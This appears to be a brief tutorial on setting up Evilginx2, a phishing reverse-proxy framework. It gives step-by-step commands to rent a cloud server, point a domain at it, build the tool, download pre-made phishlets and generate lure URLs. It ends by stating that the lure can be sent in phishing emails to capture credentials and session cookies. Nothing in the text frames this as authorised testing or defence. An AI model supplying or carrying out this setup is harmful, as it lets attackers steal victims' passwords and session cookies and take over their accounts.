Evilginx 101

Getting Started with Evilginx

The first thing you need to get Evilginx up and running is some computing power. You are welcome to download it right onto your local machine, or spin up your own cloud instance. We often use Digital Ocean droplets as they are low cost and easy to use. If you wish to install Evilginx locally you can dive right in. If you need to spin up a Digital Ocean droplet, you can follow the steps here.

Connecting your domain with your IP

Evilginx requires a domain to create its lures. If you do not already have a domain, you can purchase one through your preferred domain registrar.

Once you have the domain, you need to associate it with the IP hosting Evilginx. You can create an A record within your registrar to point to the IP.

Setting up Evilginx

1. If you just spun up a Digital Ocean droplet, run sudo apt update

2. If you do not have Go installed, run sudo apt install git golang-go. If Go is already on your machine you can skip this step.

3. Now we are going to clone the Evilginx repository by running git clone https://github.com/kgretzky/evilginx2.git

4. Once the repo has been cloned, move into the Evilginx directory using cd evilginx2

5. Now run make. This will create the Eviginx executable. If you do not have make installed, run apt install make

6. To run the executable use ./build/evilginx -p phishlets/

   NOTE: you can create your own phishlets or use pre-made phishlets by saving them in the ./phishlets directory. To download pre-made phishlets:

   1. Run git clone https://github.com/An0nUD4Y/Evilginx2-Phishlets

   2. Then run cp -r Evilginx2-Phishlets/* ./evilginx2/phishlets/

7. Now it's time to configure Evilginx by running the commands below:

   1. config ipv4 <your_IPv4>

   2. config domain <your_domain>

   3. phishlets hostname <phishlet_name> <your_domain>

   4. phishlets enbable <phishlet_name>

   5. lures create <phishlet_name>

   6. lures get-url <lure_id>

This lure can now be used in a phishing email to capture credentials and cookies!